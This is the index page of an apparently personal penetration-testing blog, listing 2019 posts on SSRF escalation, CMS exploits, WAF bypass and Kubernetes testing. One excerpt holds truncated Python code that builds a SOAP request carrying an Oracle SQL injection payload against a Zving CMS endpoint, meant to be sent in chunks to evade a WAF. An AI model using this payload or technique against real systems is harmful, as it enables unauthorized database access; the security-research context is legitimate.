Neurohazard
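Evening clouds and misty moon, poring over the classics until white-haired; of all the myriad phenomena, thus have I heard.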

[Bug Bounty Reading Notes] [Synack] Using AWS Metadata API to escalate SSRF to RCE

March 18, 2019

[Bug Bounty Reading Notes] [Synack] Using AWS Metadata API to escalate SSRF to RCE

Using AWS Metadata API to escalate SSRF to RCE

March 17, 2019

Collection of Exploit Cases for Common CMS Vulnerabilities

Collection of Exploit Cases for Common CMS Vulnerabilities

March 15, 2019

[WAF Evasion] Using Chunked Transfer to Bypass WAF

Bypassing WAF with chunked transfer

Basic information

```python
import requests
from io import BytesIO


def read_in_chunks(file_object, chunk_size=3):
    # Yield the file object's contents chunk_size bytes at a time.
    while True:
        data = file_object.read(chunk_size)
        if not data:
            break
        yield data


data = r'''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.cms.zving.com">
<soapenv:Header/>
<soapenv:Body>
<web:addCatalog>
<web:in0>2</web:in0>
<web:in1>{sql}</web:in1>
<web:in2>1</web:in2>
<web:in3>1</web:in3>
</web:addCatalog>
</soapenv:Body>
</soapenv:Envelope>'''
sql = r"' or dbms_aw_xml.readawmetadata((select rawtohex(banner) from v$version where rownum=1), null) is null--"
# BytesIO requires bytes on Python 3, so encode the formatted body.
data = BytesIO(data.format(sql=sql).encode("utf-8"))
```

[…]

March 15, 2019

Burp Scanner DOM-based XSS issue

Burp Scanner DOM-based XSS issue

March 13, 2019

The Hacker Playbook 3: Cyber Space Kittens

The Hacker Playbook 3: Cyber Space Kittens

March 12, 2019

Setting Up AutoSQLi and Basic Usage of sqlmapapi

Setting Up AutoSQLi and Basic Usage of sqlmapapi

March 12, 2019

[Bug Bounty Reading Notes] vimeo: From SSRF to Potential Code Execution

Reading notes on the vimeo report: from SSRF to potential code execution

March 10, 2019

Bash Bunny User Guide

Bash Bunny User Guide

March 7, 2019

Penetration Testing Kubernetes / k8s Clusters

Penetration Testing Kubernetes / k8s Clusters

February 18, 2019

Chrome/Firefox SSL/TLS Negotiation Error ERR_SSL_VERSION_OR_CIPHER_MISMATCH

Chrome/Firefox SSL/TLS Negotiation Error